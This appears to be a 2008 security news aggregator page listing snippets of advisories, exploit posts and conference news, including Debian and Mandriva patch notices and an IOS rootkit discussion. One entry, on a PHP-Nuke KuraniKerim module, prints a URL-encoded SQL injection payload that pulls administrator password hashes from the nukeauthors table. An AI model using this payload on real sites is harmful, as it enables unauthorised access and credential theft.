Re: Re: Re: Re: Apache Server HTML Injection and UTF-7 XSS Vulnerability

 ( 147 days 3 hours ago)

Dear Bill From Apache ...

StanWeb.CMS (default.asp id) Remote SQL Injection Exploit

 ( 147 days 9 hours ago)

# --== Spanish Hackers Team (www.spanish-hackers.com) ==-- # --== StanWeb.CMS (default.asp id) Remote SQL Injection Exploit ==-- # --====-- # [] [JosS] [Spanish Hackers Team] [Sys - Project] # [] Info: # [] Software: StanWeb.CMS # [] Exploit: Remote SQL Injection [High] ...

[SECURITY] [DSA 1578-1] New php4 packages fix several vulnerabilities

 ( 147 days 9 hours ago)

- Debian Security Advisory DSA-1578-1 securityatdebian.org Thijs Kinkhorst May 17, 2008 - Package : php4 Vulnerability : several Problem type : local/remote Debian-specific: no CVE Id(s) : CVE-2007-3799 CVE-2007-3806 CVE-2007-3998 CVE-2007-4657 CVE-2008-2051 Several vulnerabilities have been discovered in PHP version 4, a ...

CFP for HITBSecConf2008 - Malaysia now open

 ( 147 days 9 hours ago)

Hello from Malaysia! The Call for Papers (CFP) for the 6th Hack In The Box Security Conference in Malaysia (27th - 30th October 2008) is now open. We've got some really cool stuff lined up this year including an ...

PHP-Nuke Module KuraniKerim [sid] SQL Injection

 ( 147 days 9 hours ago)

Author : Lovebug Italy Rbt-4 Crew www.rbt-4.net PHP-Nuke Module KuraniKerim [sid] SQL Injection Bug : modules.php?name=KuraniKerim&op=TurkceNukeComIslamiModullerDestekSitesi&sid = [S Q L] Exploit :-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd,aid,2,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnukeauthors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A special tnx to: Rbt-4 crew & wishes for Robo

IOS rootkits

 ( 147 days 9 hours ago)

At the upcoming EusecWest Sebastian Muniz will apparently unveil an IOS rootkit. skip below for the news item itself. We've had discussions on this before, here and elsewhere. I've been heavily attacked on the subject of considering router security as an issue when compared to routing security. ...

Mandriva: Updated libvorbis packages fix vulnerabilities

 ( 147 days 20 hours ago)

LinuxSecurity.com: Will Drewry of the Google Security Team reported several vulnerabilities in how libvorbis processed audio data. An attacker could create a carefuly crafted OGG audio file in such a way that it would cause an application linked to libvorbis to crash or possibly execute arbitray code when opened (CVE-2008-1419, CVE-2008-1420, CVE-2008-1423).

Mandriva: Updated rdesktop packages fix vulnerabilities

 ( 147 days 20 hours ago)

LinuxSecurity.com: Several vulnerabilities were discovered in rdesktop, a Remote Desktop Protocol client. An integer underflow vulnerability allowed attackers to cause a denial of service (crash) and possibly execute arbitrary code with the privileges of the logged-in user (CVE-2008-1801).